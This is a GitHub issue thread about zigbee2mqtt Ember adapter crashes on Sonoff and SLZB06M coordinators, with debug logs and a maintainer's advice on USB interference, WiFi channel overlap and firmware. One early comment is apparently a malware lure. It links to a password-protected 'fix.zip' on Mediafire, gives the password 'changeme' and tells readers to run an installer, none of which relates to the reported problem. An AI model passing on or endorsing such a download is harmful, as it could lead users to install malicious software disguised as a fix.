Koenkk/zigbee2mqtt #23761: zh:ember:ezsp: Found no buffer in queue but ASH layer sent signal that one was available.

rrakso, 2024-08-28:
### What happened?

My ZigBee network just stopped working. And I got this error message: `zh:ember:ezsp: Found no buffer in queue but ASH layer sent signal that one was available. `

---

It is also worth mentioning, that when I'm restarting the Home Assistant, then somehow Z2M after reboot causes HA to reboot again, but this time Z2M is not running. I had to switch `autostart` of Z2M to false, because in other case I will end in reboot loop.

To fix this all I must do is:
Unplug adapter `>` reboot Home Assistant `>` Start Zigbee2MQTT (it will fail, ok, there is no adapter plugged in) `>` Start Zigbee2MQTT again `>` wait some time (2 to 4 s) `>` plug in adapter.
From now on everything is working perfectly!

### What did you expect to happen?

I expected that everything should work smoothly as always 😁 

### How to reproduce it (minimal and precise)

I don't know how to reproduce it. It has happend second time.

### Zigbee2MQTT version

1.39.1

### Adapter firmware version

7.4.3

### Adapter

Sonoff ZBDongle-E with ember

### Setup

HA on a Raspberry Pi 3 (`rpi3-64`)

### Debug log

```txt
[2024-08-28 09:42:23] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":233,"last_seen":"2024-08-28T09:42:23+02:00","linkquality":200,"maximum_range":5,"minimum_range":0,"presence":false,"radar_sensitivity":4,"target_distance":0}'
[2024-08-28 09:42:24] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=135 Len=26].
[2024-08-28 09:42:24] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=135 Len=26].
[2024-08-28 09:42:24] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":233,"last_seen":"2024-08-28T09:42:24+02:00","linkquality":196,"maximum_range":5,"minimum_range":0,"presence":false,"radar_sensitivity":4,"target_distance":0}'
[2024-08-28 09:42:51] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":233,"last_seen":"2024-08-28T09:42:51+02:00","linkquality":200,"maximum_range":5,"minimum_range":0,"presence":false,"radar_sensitivity":4,"target_distance":0}'
[2024-08-28 09:42:53] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ASH_ERROR_TIMEOUTS. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=139 Len=7].
[2024-08-28 09:42:53] error: 	zh:ember: !!! ADAPTER FATAL ERROR reason=ASH_ERROR_TIMEOUTS. !!!
[2024-08-28 09:42:53] info: 	zh:ember: Attempting adapter reset...
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash: ASH COUNTERS since last clear:
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Total frames: RX=2291, TX=2766
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Cancelled   : RX=0, TX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   DATA frames : RX=2237, TX=673
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   DATA bytes  : RX=52490, TX=17515
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Retry frames: RX=41, TX=5
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   ACK frames  : RX=13, TX=2088
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   NAK frames  : RX=0, TX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   nRdy frames : RX=0, TX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   CRC errors      : RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Comm errors     : RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Length < minimum: RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Length > maximum: RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Bad controls    : RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Bad lengths     : RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Bad ACK numbers : RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Out of buffers  : RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Retry dupes     : RX=41
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   Out of sequence : RX=0
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash:   ACK timeouts    : RX=5
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash: Port closed.
[2024-08-28 09:42:53] info: 	zh:ember:uart:ash: ======== ASH stopped ========
[2024-08-28 09:42:53] info: 	zh:ember:ezsp: ======== EZSP stopped ========
[... 138 lines cut ...]
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   ACK frames  : RX=0, TX=37
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   NAK frames  : RX=0, TX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   nRdy frames : RX=0, TX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   CRC errors      : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Comm errors     : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Length < minimum: RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Length > maximum: RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Bad controls    : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Bad lengths     : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Bad ACK numbers : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Out of buffers  : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Retry dupes     : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   Out of sequence : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash:   ACK timeouts    : RX=0
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash: Port closed.
[2024-08-28 09:43:40] info: 	zh:ember:uart:ash: ======== ASH stopped ========
[2024-08-28 09:43:40] info: 	zh:ember:ezsp: ======== EZSP stopped ========
[2024-08-28 09:43:41] info: 	zh:ember: ======== Ember Adapter Stopped ========
[2024-08-28 09:43:41] error: 	z2m: Adapter disconnected, stopping
[2024-08-28 09:43:41] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/bridge/state', payload '{"state":"offline"}'
[2024-08-28 09:43:41] info: 	z2m: Disconnecting from MQTT server
[2024-08-28 09:43:41] info: 	z2m: Stopping zigbee-herdsman...
[2024-08-28 09:43:41] info: 	z2m: Stopped zigbee-herdsman
[2024-08-28 09:43:41] info: 	z2m: Stopped Zigbee2MQTT
```

LC-JiaZhaorong, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

rrakso, 2024-08-29:
It has happened today twice :c

I see some of
```
[2024-08-29 20:57:01] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ASH_ERROR_TIMEOUTS. Last Frame: [FRAME: ID=83:"SET_CONFIGURATION_VALUE" Seq=12 Len=6].
```

Nerivec, 2024-08-30:
You are getting different errors here, so, at first glance, it would point to the adapter being unstable. Did you look into removing possible sources of interference for the USB? (I see you are on a Pi, so, powered USB hub, extension cable, etc...)
Since you are also getting troubles with HA<>Z2M, make sure your Pi isn't having issues (check system logs, power supply, hardware, etc).

_Note: September 1st release should also help on some edge-cases interference issues (2.4GHz ones)._

rrakso, 2024-08-30:
Thank you very much @Nerivec! I will make sure that power supply isn't the problem - I need to find somewhere a [5V 3A](https://www.amazon.com/Raspberry-Pi-USB-C-Power-Supply/dp/B07W8XHMJZ/) power supply, currently I'm using strong phone charger.

The dongle is connected directly to the RPi. Also I'll be waiting for the September 1st release to check it will help somehow :D Thank you so much for your reply @Nerivec.

PS
For me these error messages like `ASH_ERROR` /  `ERROR_WRONG_DIRECTION` says nothing :/ I mean I don't know how to fix them on my own. This is why I appreciate your help so much.

PPS
The RPi + Zigbee coordinator are very close to my router 2.4GHz/5GHz router.

Nerivec, 2024-08-30:
Interference can result is various errors that don't actually have any meaning because they are randomly triggered. Once this is improved/fixed, then we can see what errors remain, if any.

The Pi is known for causing USB troubles. Make sure to use a USB extension cord to connect the adapter to it, so you can place it farther away from the Pi. A powered USB hub (a USB hub with it's own power supply, so it doesn't draw on the Pi) also fixed several problems for other users in the past.

As for your router, if you haven't already, make sure your 2.4GHz WiFi and your ZigBee use very different channels. Usually, channel 20 or 25 for ZigBee is your best bet. You can also check channels usage around you with [ember-zli](https://github.com/Nerivec/ember-zli/wiki/Stack#scan-network).

[image]
Note: `ember` supports changing channel, so you shouldn't need to re-pair many devices (only a few capricious ones, if any).

rrakso, 2024-09-03:
Now I'm using the [v1.40.0-1](https://github.com/Koenkk/zigbee2mqtt/releases/tag/1.40.0) of _zigbee2mqtt_ and the problem has happened again... :/. 

In a period of 2 hours (before the fatal error occurred) I got five times `error: zh:ember:ezsp: ERROR transaction failure; status=ERROR_WRONG_DIRECTION. Last frame: [FRAME: ID=52:"SEND_UNICAST" Seq=<number> Len=<number>]`.

And these were the last errors:
```
[2024-09-03 10:09:28] error: zh:ember:uart:ash: Received ERROR from adapter with code=ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT.
[2024-09-03 10:09:30] error: zh:ember:uart:ash: ASH disconnected | Adapter status: ASH_NCP_FATAL_ERROR
[2024-09-03 10:09:31] error: zh:ember:uart:ash: Error parsing received frame, status=ASH_NCP_FATAL_ERROR.
[2024-09-03 10:09:32] error: zh:ember: Adapter fatal error: HOST_FATAL_ERROR
```

Before I try to test the USB cable extension / powered USB hub, perhaps I should reflash my adapter with firmware with a different baud rate? Currently I'm using the [230400](https://github.com/darkxst/silabs-firmware-builder/blob/main/firmware_builds/zbdonglee/ncp-uart-hw-v7.4.3.0-zbdonglee-230400.gbl) version, should I use the [115200](https://github.com/darkxst/silabs-firmware-builder/blob/main/firmware_builds/zbdonglee/ncp-uart-hw-v7.4.3.0-zbdonglee-115200.gbl) version? What do you think @Nerivec? 

<details>
<summary>The rest of the log ("duplicates" removed)</summary>

```
[2024-09-03 08:08:43] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":128,"last_seen":"2024-09-03T08:08:43+02:00","linkquality":208,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 08:09:20] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":128,"last_seen":"2024-09-03T08:09:20+02:00","linkquality":208,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 08:09:20] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=220 Len=19].
[2024-09-03 08:09:20] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=220 Len=19].
[2024-09-03 08:09:20] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":128,"last_seen":"2024-09-03T08:09:20+02:00","linkquality":208,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 10:02:21] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":220,"last_seen":"2024-09-03T10:02:21+02:00","linkquality":212,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 10:02:22] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":220,"last_seen":"2024-09-03T10:02:22+02:00","linkquality":212,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 10:02:22] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=11 Len=26].
[2024-09-03 10:02:22] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=11 Len=26].
[2024-09-03 10:02:22] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":220,"last_seen":"2024-09-03T10:02:22+02:00","linkquality":212,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 10:02:22] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":220,"last_seen":"2024-09-03T10:02:22+02:00","linkquality":212,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 10:02:55] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":220,"last_seen":"2024-09-03T10:02:55+02:00","linkquality":212,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 10:02:55] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":220,"last_seen":"2024-09-03T10:02:55+02:00","linkquality":212,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[2024-09-03 10:02:55] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=33 Len=16].
[2024-09-03 10:02:55] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_WRONG_DIRECTION. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=33 Len=16].
[2024-09-03 10:02:55] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":220,"last_seen":"2024-09-03T10:02:55+02:00","linkquality":212,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":2,"target_distance":0}'
[... cut ...]
[2024-09-03 10:09:40] info: 	zh:ember: ======== Ember Adapter Stopped ========
[2024-09-03 10:09:40] error: 	z2m: Adapter disconnected, stopping
[2024-09-03 10:09:40] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/bridge/state', payload '{"state":"offline"}'
[2024-09-03 10:09:40] info: 	z2m: Disconnecting from MQTT server
[2024-09-03 10:09:40] info: 	z2m: Stopping zigbee-herdsman...
[2024-09-03 10:09:40] info: 	z2m: Stopped zigbee-herdsman
[2024-09-03 10:09:40] info: 	z2m: Stopped Zigbee2MQTT
```
</details>

rrakso, 2024-09-04:
@Nerivec  could you please tell me what these errors mean? Maybe I can find out how to fix this too, haha

```
[2024-09-04 19:38:42] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_TRUNCATED. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=108 Len=7].
[2024-09-04 19:38:42] error: 	zh:ember: Adapter fatal error: ERROR_TRUNCATED
```

After these errors the zigbee2mqtt stopped working. 

Now I am using a better power supply with a better cable (but I still don't have the you know the strong 5V 3A real one - but it worked so long with the old type :c really strange), but the baud is still `230400`. Today I will reflash the dongle to `115200` to see if that helps.

<details>
<summary>The rest of the log</summary>

```
[2024-09-04 19:38:41] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/sensor', payload '{"detection_delay":0,"fading_time":2,"illuminance_lux":15,"last_seen":"2024-09-04T19:38:41+02:00","linkquality":176,"maximum_range":4,"minimum_range":0,"presence":false,"radar_sensitivity":3,"target_distance":0}'
[2024-09-04 19:38:42] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ERROR_TRUNCATED. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=108 Len=7].
[2024-09-04 19:38:42] error: 	zh:ember: Adapter fatal error: ERROR_TRUNCATED
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash: ASH COUNTERS since last clear:
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Total frames: RX=9429, TX=11492
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Cancelled   : RX=0, TX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   DATA frames : RX=9155, TX=2843
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   DATA bytes  : RX=211252, TX=73968
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Retry frames: RX=226, TX=34
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   ACK frames  : RX=48, TX=8615
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   NAK frames  : RX=0, TX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   nRdy frames : RX=0, TX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   CRC errors      : RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Comm errors     : RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Length < minimum: RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Length > maximum: RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Bad controls    : RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Bad lengths     : RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Bad ACK numbers : RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Out of buffers  : RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Retry dupes     : RX=226
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   Out of sequence : RX=0
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash:   ACK timeouts    : RX=34
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash: Port closed.
[2024-09-04 19:38:42] info: 	zh:ember:uart:ash: ======== ASH stopped ========
[2024-09-04 19:38:42] info: 	zh:ember:ezsp: ======== EZSP stopped ========
[2024-09-04 19:38:42] info: 	zh:ember: ======== Ember Adapter Stopped ========
[2024-09-04 19:38:42] error: 	z2m: Adapter disconnected, stopping
[2024-09-04 19:38:43] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/bridge/state', payload '{"state":"offline"}'
[2024-09-04 19:38:43] info: 	z2m: Disconnecting from MQTT server
[2024-09-04 19:38:43] info: 	z2m: Stopping zigbee-herdsman...
[2024-09-04 19:38:43] info: 	z2m: Stopped zigbee-herdsman
[2024-09-04 19:38:43] info: 	z2m: Stopped Zigbee2MQTT
```
</details>

Nerivec, 2024-09-05:
```typescript
    /** The direction flag in the frame control field was incorrect. */
    ERROR_WRONG_DIRECTION = 0x32,
    /**
     * The truncated flag in the frame control field was set, indicating there was not enough memory available to
     * complete the response or that the response would have exceeded the maximum EZSP frame length.
     */
    ERROR_TRUNCATED = 0x33,
    /**
     * The overflow flag in the frame control field was set, indicating one or more callbacks occurred since the previous
     * response and there was not enough memory available to report them to the Host.
     */
    ERROR_OVERFLOW = 0x34,
```
From https://github.com/Koenkk/zigbee-herdsman/blob/master/src/adapter/ember/enums.ts#L755

But as mentioned before, with the varying errors, it looks like interference, which may result in errors that would not necessarily mean anything (except something interfered 😛).

> I have one of these

Try to temporarily remove that device from the network if you can, see if it works better after that. _That device creates some strange behaviors for sure._

rrakso, 2024-09-12:
So after a week of testing I have unplugged the [ZY-M100-S_2](https://www.zigbee2mqtt.io/devices/ZY-M100-S_2.html#tuya-zy-m100-s_2) and everything seems to work pretty good! 

I still have the problem that I have to disconnect and reconnect the adapter after rebooting the Raspberry Pi[^2], but I was able to switch to the previously used power supply two days ago and everything still works fine!

In the next two weeks I plan to temporarily run my HA with Z2M on an old laptop (with a better processor than RPI, and with 4GB of RAM instead of the 1GB it currently has).

[^2]: When I try to start Z2M after the RPI reboot, all I see is the addon starting, some logs: `[10:37:16] INFO: Preparing to start... [10:37:16] INFO: Socat not enabled [10:37:16] INFO: Starting Zigbee2MQTT... Starting Zigbee2MQTT without watchdog.` and then I got an error message from HA saying "connection lost, trying to reconnect". (The HA reboots? Can I see logs before the reboot crash?

Nerivec, 2024-10-01:
Quick note, not sure what step you are on, but make sure to update to 7.4.4 too, it seems to have fixed several problems for a few users.

ortofan, 2024-12-05:
I get the following error everytime I restart or start z2m.

zh:ember:uart:ash: Received ERROR from adapter while connecting, with code=ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT.

If I rebbot the coordinators before starting the z2m instance no error.

Running latest firmware, latest z2m on 3 separate instances. there are 0 interference issues all 3 installs are  SLZB06M.

szwacz, 2024-12-06:
Stumbling upon the same issue all the time and troubleshooting. When this error happens the only way to put network back online is to restart Home Assistant, restarting Z2M just gives me same error instantly.
So far did:
- Upgraded to coordinator SLZB06M, flashed with 7.4.5 firmware.
- Removed from network one device that is not on the official support list of Z2M.

Fortunately I have two locations with completely same zigbee configuration and after recent changes on one of them the error happens once every 1-2 days. And the other location is stable for 4 days already. So maybe some externat interferences are in play. Will report about new developments in my networks.

microneer, 2024-12-07:
For me, this was solved by changing my WiFi channel. 

I was having lots of ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT errors, which were causing Zigbee2MQTT to restart. I could reproduce it almost always by recreating the map. 

I found i had the Ember coordinator on Zigbee channel 25 and my 2.4GHz WiFi on Channel 11. These channels overlap according to the diagram above. Moving my WiFi to channel 4 **mostly** solved the problem. Significantly less frequent errors and restarts.

However, what I'm unclear on, @Nerivec , is why a timeout should require Zigbee2MQTT to restart? There are people on HA's forum having problems too: https://community.home-assistant.io/t/error-messages-trying-to-ota-update-devices-using-z2m-on-a-ha-yellow/788913/2

Nerivec, 2024-12-07:
Whenever an ERROR frame is received from the adapter, it means the adapter has entered a "failed state", after which, the only recourse is to restart the stack. _In a lot of cases, it's only about keeping proper synchronization between the adapter and the application._
About restarting only the adapter internally, or restarting Z2M completely, both are pretty much equivalent, since the adapter restart makes for most of the Z2M restart, and it avoids many potential issues with higher-levels of Z2M, _tl;dr it's much cleaner_.

As for the error itself, most of the reports here look like interference indeed (_you may not realize how bad it can get in some situations, and not necessarily from your environment, but neighbors too; the SLZB06M also seems particularly susceptible_), but the adapter should handle this better nonetheless. I suspect a firmware issue when the radio comes under stress, but we'll have to wait for silabs on that one...

szwacz, 2024-12-09:
@Nerivec so restart of just Z2M zhould be enough to bring network back online? Why this issue is so annoying for me is that Home Assistant restarts Z2M plugin, but it just keeps crashing in a loop with same error, what exhausts watchdog restart counter and the network fails permanently. Manual restarts of Z2M by me, after few hours when I realized the network is down, still leads to the error. The only way is to restart Home Assistant as a whole. This is the strange part for me.

Nerivec, 2024-12-09:
@szwacz And that happens with SLZB06M (TCP-based)? If it were with a USB device, I'd say something goes wrong with the USB on HA, but I assume the TCP adapter is not connected directly to the HA machine?
You are not using the WiFi option in the SLZB06M, correct? (Because that's definitely not stable in itself.)

szwacz, 2024-12-10:
@Nerivec you are correct, I use it via ethernet cable.
After firmware updates and OTA updates the network seems to be more stable and doesn't fail completely (so far). That being said I still get ERROR_WRONG_DIRECTION for some reason and my network consists of just 3 types of devices all of which are on the "supported devices" list. May it start the cascade that ends in ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT?

Nerivec, 2024-12-10:
`NOUS` devices are known to cause `ERROR_WRONG_DIRECTION` for some unknown reason, do you have any?
This happens when Z2M receives a command from the adapter (it's only supposed to receive responses). Since it appears to not create issues (it's only a passive detection mechanism, it does not create an "error state") it was downgraded from an event that previously forced the adapter to restart (per silabs), to an event that is just logged (previous implementations, including current ZHA, don't even have this check at all). It shouldn't have a link with the other error, except if both are caused by interferences, then the specifics of the error become irrelevant, it only means "something is affecting the flow of information, the adapter is not happy".

It is strange that it requires a full HA restart to fix it though.

Since you upgraded your network, I assume you have the old adapter laying around somewhere? Can you use it with Ember ZLI to scan for networks + channels, to see what the environment is like around you for reference (preferably closer to the new adapter)? https://github.com/Nerivec/ember-zli/wiki/Stack#scan-network

Nerivec, 2024-12-10:
@ortofan what core firmware version do you have on the SLZB06M? Versions around 2.5.6 are known to have a bug that slows down the ESP side. That is reflected in the Zigbee side with timeouts.

ortofan, 2024-12-10:
v2.6.8.dev16  and Zigbee:
Dev firmware
Revision: 20241127
Release notes
For 'adapter: ember' adapter settings in Z2M!
SDK 7.4.5

szwacz, 2024-12-10:
@Nerivec Thank you for that explanation. Indeed I have [NOUS A1Z](https://www.zigbee2mqtt.io/devices/A1Z.html#nous-a1z) in my network. So this issue should be separate of the one here.

Thankfully failure of the network just happenedn, so I had the chance to observe it better. The hunch about CPU usage is intresting one, because I use Raspberry PI 3B+.

First attaching logs of when the fail happened.
[network fail happened.log](https://github.com/user-attachments/files/18083134/network.fail.happened.log)
(sorry that log files are not trimmed, but I wanted to present the whole vicious loop).

I've discovered it after half an hour, and clicked just "start" in the Z2M addon options again.
Here is log of that (we are still in the vicious loop). 
[z2m restart.log](https://github.com/user-attachments/files/18083153/z2m.restart.log)

This is memory and cpu usage recorded during events from the log file above. 
[image]
Memory too high?
CPU doesn't seem to be that affected, but when I was clicking through home assistant UI it felt more and more laggy with every next restart. Very interesting.

After restarting whole HA everything went back to normal. Indeed maybe I should try upgrading my raspberry....

CloudMass, 2024-12-10:
This happens to me as well. Once or twice a day my Zigbee network crashes. 

As far as I can see it often when it's under "high" load (As in a lot of devices are asked to do things at the same time). I can also reproduce the issue by trying to push an update to one of my Hue lamps. It will fail because if the crash.

Adapter: Sonoff ZBDongle-E
Zigbee2MQTT version: [1.42.0](https://github.com/Koenkk/zigbee2mqtt/releases/tag/1.42.0)
Coordinator type: EmberZNet
Coordinator revision: [8.0.2](https://github.com/Nerivec/silabs-firmware-builder/releases/tag/v2024.6.2-update3)

`[2024-12-10 17:58:42] info: 	z2m: Update of 'Hallway - Ceiling' at 50.56%, ≈ 0 minutes remaining
[2024-12-10 17:58:42] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/Hallway - Ceiling', payload '{"brightness":79,"color_mode":"color_temp","color_temp":406,"linkquality":164,"power_on_behavior":null,"state":"OFF","update":{"installed_version":16786182,"latest_version":16786434,"progress":50.56,"remaining":30,"state":"updating"},"update_available":null}'
[2024-12-10 17:59:03] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/Kitchen - Motion', payload '{"battery":100,"device_temperature":23,"illuminance":8,"illuminance_lux":8,"linkquality":255,"occupancy":true,"power_outage_count":65,"voltage":3065}'
[2024-12-10 17:59:03] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/Kitchen - Motion', payload '{"battery":100,"device_temperature":23,"illuminance":8,"illuminance_lux":8,"linkquality":255,"occupancy":true,"power_outage_count":65,"voltage":3065}'
[2024-12-10 17:59:09] error: 	zh:ember:uart:ash: Received ERROR from adapter, with code=ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT.
[2024-12-10 17:59:09] error: 	zh:ember:uart:ash: ASH disconnected | Adapter status: ASH_NCP_FATAL_ERROR
[2024-12-10 17:59:09] error: 	zh:ember:uart:ash: Error while parsing received frame, status=ASH_NCP_FATAL_ERROR.
[2024-12-10 17:59:09] error: 	zh:ember: Adapter fatal error: HOST_FATAL_ERROR
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash: ASH COUNTERS since last clear:
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Total frames: RX=1494, TX=1981
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Cancelled   : RX=0, TX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   DATA frames : RX=1486, TX=484
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   DATA bytes  : RX=43213, TX=33526
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Retry frames: RX=6, TX=3
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   ACK frames  : RX=0, TX=1493
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   NAK frames  : RX=0, TX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   nRdy frames : RX=0, TX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   CRC errors      : RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Comm errors     : RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Length < minimum: RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Length > maximum: RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Bad controls    : RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Bad lengths     : RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Bad ACK numbers : RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Out of buffers  : RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Retry dupes     : RX=6
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   Out of sequence : RX=0
[2024-12-10 17:59:09] info: 	zh:ember:uart:ash:   ACK timeouts    : RX=3
